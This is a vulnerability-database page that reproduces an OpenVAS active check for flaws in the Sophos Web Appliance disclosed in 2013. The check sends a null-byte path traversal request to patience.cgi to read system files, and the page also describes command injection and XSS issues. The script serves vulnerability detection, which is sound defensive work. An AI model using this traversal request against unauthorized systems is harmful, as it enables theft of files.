Lucene search
+L

Sophos Web Appliance Web Interface Multiple Vulnerabilities (Feb 2013) - Active Check

🗓️ 04 Apr 2013 00:00:00Reported by Copyright (C) 2013 Greenbone AGType 
openvas
 openvas
🔗 plugins.openvas.org👁 37 Views

Sophos Web Appliance Web Interface Multiple Vulnerabilities (Feb 2013) - Active Check. Prone to multiple vulnerabilities including unauthenticated local file disclosure, OS command injection, and Cross Site Scripting (XSS). Vendor released version 3.7.8.2 to address these issues

Related
Refs
Code
ReporterTitlePublishedViews
Family
zdt
zdt
Sophos Web Protection Appliance 3.7.8.1 XSS / Command Execution
4 Apr 201300:00
zdt
circl
Circl
CVE-2013-2641
29 May 201815:50
circl
checkpoint_advisories
Check Point Advisories
Sophos Web Protection Appliance patience.cgi Directory Traversal (CVE-2013-2641)
15 Oct 201300:00
checkpoint_advisories
cve
CVE
CVE-2013-2641
18 Mar 201414:00
cve
cve
CVE
CVE-2013-2642
18 Mar 201414:00
cve
cve
CVE
CVE-2013-2643
18 Mar 201414:00
cve
cvelist
Cvelist
CVE-2013-2641
18 Mar 201414:00
cvelist
cvelist
Cvelist
CVE-2013-2642
18 Mar 201414:00
cvelist
cvelist
Cvelist
CVE-2013-2643
18 Mar 201414:00
cvelist
dsquare
Dsquare
Sophos Web Protection Appliance 3.7.8.1 File Disclosure
10 Feb 201400:00
dsquare
Rows per page
# SPDX-FileCopyrightText: 2013 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

CPE = "cpe:/a:sophos:web_appliance";

if (description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.103688");
  script_version("2025-04-15T05:54:49+0000");
  script_tag(name:"last_modification", value:"2025-04-15 05:54:49 +0000 (Tue, 15 Apr 2025)");
  script_tag(name:"creation_date", value:"2013-04-04 14:28:20 +0200 (Thu, 04 Apr 2013)");
  script_tag(name:"cvss_base", value:"9.3");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:C/I:C/A:C");

  script_cve_id("CVE-2013-2641", "CVE-2013-2642", "CVE-2013-2643");

  script_tag(name:"qod_type", value:"remote_vul");

  script_tag(name:"solution_type", value:"VendorFix");

  script_name("Sophos Web Appliance Web Interface Multiple Vulnerabilities (Feb 2013) - Active Check");

  script_category(ACT_ATTACK);

  script_copyright("Copyright (C) 2013 Greenbone AG");
  script_family("Web application abuses");
  script_dependencies("gb_sophos_web_appliance_http_detect.nasl", "os_detection.nasl");
  script_require_ports("Services/www", 443);
  script_mandatory_keys("sophos/web_appliance/http/detected");

  script_tag(name:"summary", value:"Sophos Web Appliance Web Interface is prone to multiple
  vulnerabilities.");

  script_tag(name:"vuldetect", value:"Sends a crafted HTTP GET request and checks the response.");

  script_tag(name:"insight", value:"The following flaws exist:

  - CVE-2013-2641 / Unauthenticated local file disclosure: Unauthenticated users can read arbitrary
  files from the filesystem with the privileges of the 'spiderman' operating system user.

  - CVE-2013-2642 / OS command injection: Authenticated users can execute arbitrary commands on the
  underlying operating system with the privileges of the 'spiderman' operating system user.

  - CVE-2013-2643 / Cross Site Scripting (XSS): Reflected Cross Site Scripting vulnerabilities were
  found. An attacker could have used these vulnerabilities to conduct phishing attacks.");

  script_tag(name:"solution", value:"The vendor released version 3.7.8.2 to address these issues.

  Please see the references and contact the vendor for information on how to obtain and apply the
  updates.");

  script_xref(name:"URL", value:"https://web.archive.org/web/20140801055954/http://www.sophos.com/en-us/support/knowledgebase/118969.aspx");

  exit(0);
}

include("host_details.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("misc_func.inc");
include("traversal_func.inc");
include("os_func.inc");

if( ! port = get_app_port( cpe:CPE, service:"www" ) )
  exit( 0 );

if( ! get_app_location( cpe:CPE, port:port, nofork:TRUE ) )
  exit( 0 );

files = traversal_files();

foreach pattern( keys( files ) ) {

  file = files[pattern];

  url = "/cgi-bin/patience.cgi?id=../../../../../../../" + file + "%00";

  req = http_get( port:port, item:url );
  res = http_keepalive_send_recv( port:port, data:req, bodyonly:TRUE );

  if( egrep( pattern:pattern, string:res ) ) {
    report = "By requesting the URL " + http_report_vuln_url( port:port, url:url, url_only:TRUE ) +
             '\nit was possible to retrieve the file /' + file + '. Response:\n\n' + chomp( res );
    security_message( port:port, data:report );
    exit( 0 );
  }
}

exit( 99 );

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Apr 2025 00:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 29.3
EPSS0.7099
37